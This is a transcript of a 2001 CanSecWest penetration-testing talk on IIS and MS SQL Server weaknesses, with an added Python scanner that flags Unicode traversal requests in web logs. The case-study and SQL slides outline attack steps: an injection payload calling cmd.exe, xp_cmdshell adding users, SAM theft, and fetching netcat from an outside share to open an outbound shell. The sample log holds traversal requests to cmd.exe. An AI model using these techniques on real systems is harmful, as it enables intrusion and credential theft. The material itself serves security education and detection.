CanSecWest 2001 - PowerPoint presentation transcript

1
CanSecWest 2001
  • H D Moore
  • Digital Defense Inc.
  • Working With You To Secure Your Networks

2
Introduction
  • Background Information
  • Why bother with NT?
  • Internet Information Server
  • Microsoft SQL Server
  • Three Case Studies

3
Background
  • Myself
  • Experience
  • Projects
  • Digital Defense
  • Our Services
  • Our Clients

4
Why bother with NT?
  • Over 20% of Internet web sites run on NT
  • Popular platform in the financial industry
  • Very difficult to make secure
  • Relatively simple to exploit

5
IIS - Overview
  • What is IIS?
  • Easy to use, easy to hack
  • Default install is massively vulnerable
  • Sample scripts provide multiple points of entry
  • Default extensions have a number of problems
  • Unicode bug allows easy command execution
  • Remote Data Services

6
IIS Sample Files
  • Samples are installed by default.
  • Service packs and patches leave samples.
  • Examples
  • /iisadmpwd/aexp4b.htr
  • /msadc/samples/adctest.asp
  • Showcode.asp

7
IIS Extensions
  • Service packs leave extensions mapped
  • .ida/.idq/.idc Path Disclosure
  • .htr/.htw View File Source
  • Importance of Global.asa

8
IIS UNICODE
  • What is UNICODE?
  • 63 ways to write the letter A
  • The directory traversal bug
  • Command execution as the IUSR account
  • Application directory traversal
  • Unicoder.pl
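
The slide above lists the Unicode directory traversal bug and the many encodings of one character. The following is an added example, not code from the presentation or from Digital Defense: a Python log check that decodes request paths the way a permissive decoder would, accepting overlong UTF-8 forms (the well-known `%c0%af` for `/` and `%c1%9c` for `\`), and then flags requests whose decoded path climbs above the web root. The log format, field order and sample lines are constructed for the example, and the lenient decoder is a model of the flawed behaviour, not IIS's actual code.

```python
from typing import Dict, List, Tuple
from urllib.parse import unquote_to_bytes


def decode_utf8_lenient(data: bytes) -> Tuple[str, bool]:
    """Decode percent-decoded request bytes as a permissive decoder would.

    A strict UTF-8 decoder rejects overlong forms such as C0 AF (an overlong '/')
    and C1 9C (an overlong '\\'). The traversal bug on the slide came from a
    decoder that accepted them, so this model accepts them too, but reports it,
    letting the scanner see the path the server saw and flag the encoding.
    Returns (decoded_text, saw_bad_utf8).
    """
    out: List[str] = []
    bad = False
    i, n = 0, len(data)
    while i < n:
        b = data[i]
        if b < 0x80:                              # plain ASCII byte
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < n:     # 2-byte lead byte
            c = data[i + 1]
            cp = ((b & 0x1F) << 6) | (c & 0x3F)   # naive low-bit masking
            if cp < 0x80 or not 0x80 <= c <= 0xBF:
                bad = True                        # overlong or bad continuation
            out.append(chr(cp))
            i += 2
        elif 0xE0 <= b <= 0xEF and i + 2 < n:     # 3-byte lead byte
            c1, c2 = data[i + 1], data[i + 2]
            cp = ((b & 0x0F) << 12) | ((c1 & 0x3F) << 6) | (c2 & 0x3F)
            if cp < 0x800 or not (0x80 <= c1 <= 0xBF and 0x80 <= c2 <= 0xBF):
                bad = True
            out.append(chr(cp))
            i += 3
        else:                                     # stray or truncated sequence
            out.append("\ufffd")
            bad = True
            i += 1
    return "".join(out), bad


def analyze_uri(uri: str) -> Dict[str, object]:
    """Percent-decode once, decode leniently, then walk the path segments."""
    text, bad = decode_utf8_lenient(unquote_to_bytes(uri))
    depth, dotdot, escapes_root = 0, False, False
    for seg in text.replace("\\", "/").split("/"):
        if seg == "..":
            dotdot = True
            if depth == 0:
                escapes_root = True               # climbed above the web root
            else:
                depth -= 1
        elif seg not in ("", "."):
            depth += 1
    return {"decoded": text, "bad_utf8": bad, "dotdot": dotdot,
            "escapes_root": escapes_root}


def is_suspicious(result: Dict[str, object]) -> bool:
    """Well-behaved clients normalise '..' away and never send non-shortest
    UTF-8 in a request line, so either one is worth an alert."""
    return bool(result["bad_utf8"] or result["dotdot"])


# Constructed W3C-style log lines (date time client method uri query status);
# the hosts, requests and timestamps are invented for this example.
SAMPLE_LOG = """\
2001-04-10 08:15:02 10.0.0.7 GET /default.asp - 200
2001-04-10 08:15:09 10.0.0.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2001-04-10 08:15:11 10.0.0.7 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir 200
2001-04-10 08:16:00 10.0.0.9 GET /images/..%2f..%2fwinnt/win.ini - 404
2001-04-10 08:16:30 10.0.0.12 GET /docs/my%20file.htm - 200
"""


def scan_log(log_text: str) -> List[Tuple[int, str, str, str]]:
    """Return (line_no, client_ip, decoded_path, reason) for each suspicious request."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        fields = line.split()
        if len(fields) < 5:
            continue
        client, uri = fields[2], fields[4]
        r = analyze_uri(uri)
        if is_suspicious(r):
            reason = "overlong/invalid UTF-8" if r["bad_utf8"] else "dot-dot segment"
            if r["escapes_root"]:
                reason += ", escapes web root"
            findings.append((line_no, client, str(r["decoded"]), reason))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Running the scanner over the constructed log reports lines 2 to 4 and leaves the two ordinary requests alone. The same canonicalisation logic belongs in the server's own path handling: decode, reject non-shortest forms outright, and only then check that the resolved path is still under the web root.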

9
IIS RDS
  • What is RDS?
  • MDAC 1.5 allows embedded VBA code
  • Upgrading to 2.x doesn't restrict access
  • SQL Relaying Attacks
  • RDS over RDS
  • Port scanning via RDS
  • Sqlrds.pl

10
(No Transcript)
11
IIS Summary
  • The sheer number of problems an out-of-the-box
    installation has almost guarantees that you will
    be able to gain access
  • Microsoft's attempt to make IIS as versatile and
    easy to use as possible also created many
    security problems
  • IIS has a long history of security bugs and it
    doesn't look like it's getting any better

12
IIS Questions
  • ?

13
Microsoft SQL Server
  • Based on Sybase engine
  • Default accounts are the biggest problem
  • Vendor software automatically installs server
  • Most SQL user restrictions can be bypassed
  • Extended Stored Procedures allow everything from
    command execution to e-mailing query results

14
SQL Default Accounts
  • The default sa account
  • The probe account in MS-SQL 6.5
  • Using an unprivileged account to gain access to
    other servers and accounts via OLE.
  • Microsoft's samples all use the sa account with
    no password.

15
SQL Ext. Procedures
  • The classic xp_cmdshell
  • Reading the SAM with xp_regread
  • Listing DSNs with xp_enumdsn
  • Remote output with sp_makewebtask
  • Accessible NetBIOS share
  • sp_makewebtask \\ip\share\out.html, select

16
SQL Exploitation
  • Finding servers
  • osql -L
  • SQLPing (www.sqlsecurity.com/faq.html)
  • Logging in
  • Default sa and probe accounts
  • Finding passwords stored in ASP
  • Getting Access
  • xp_cmdshell net user /ADD
  • xp_regread HKLM/Security/SAM

17
SQL Summary
  • The features that Microsoft added to the base
    Sybase engine make it much more hacker friendly
  • Multiple access methods and information
    divulgence make finding and connecting to the
    server relatively easy
  • Lack of security documentation in conjunction
    with Microsoft's sample code ensures the problem
    is only going to get worse

18
SQL Questions
  • ?

19
Case Study MDAC 1.5
  • All samples were removed
  • System was running the latest patches
  • ASP based employee directory
  • Single quote in the name field produced an ODBC
    error
  • ODBC error message contained table and column
    names, which I used to rewrite the SQL query

20
Case Study MDAC 1.5
  • SELECT * from TBL where ID = 'field'
  • field = BOGUS' OR ID = shell(cmd.exe /c )
  • SELECT * from TBL where ID = 'BOGUS' OR ID =
    shell(cmd.exe /c )
  • Executed rdisk /s- to rebuild SAM file
  • Copied sam._ to web root directory and cracked it
  • copy \\www.desktopgirls.com\share\nc.exe c:\
  • Launched an outgoing netcat command shell to port
    80
  • Used Admin password to gain access to rest of
    network

21
Case Study SQL RDS
  • IIS 3.0 with samples removed
  • Not vulnerable to Unicode
  • Msadcs.dll (RDS) was available, but had been
    upgraded to 2.5
  • Created a Perl script which used RDS to relay a
    SQL connection to localhost, using the default
    sa account with no password

22
Case Study SQL RDS
  • Called the xp_cmdshell stored procedure to
    rebuild the SAM and copy it over to the web root
    directory
  • Executed netcat to send an outbound command shell
  • Used Admin password to access the rest of the
    network

23
Case Study VNC
  • IIS 4.0 with no samples
  • Unicode vulnerability
  • Port 1300 allowed through firewall
  • Used the Unicode vulnerability to create the
    upload.asp script
  • Uploaded the cmdasp.asp script, which provides
    SYSTEM access under IIS 4.0

24
Case Study VNC
  • VNC display set to 4600 or 60395
  • Uploaded the VNC server, reg.exe, the registry
    file, and dlls through upload.asp
  • Imported registry and installed WinVNC
  • Started VNC service and connected to port 1300
  • Hijacked the desktop of the current user

25
Case Studies
  • Questions?

26
(No Transcript)
27
Conclusion
  • Resources
  • http://www.digitaloffense.net/csw/
  • http://www.wiretrip.net/rfp
  • http://www.sqlsecurity.com/
  • hdmoore@digitaldefense.net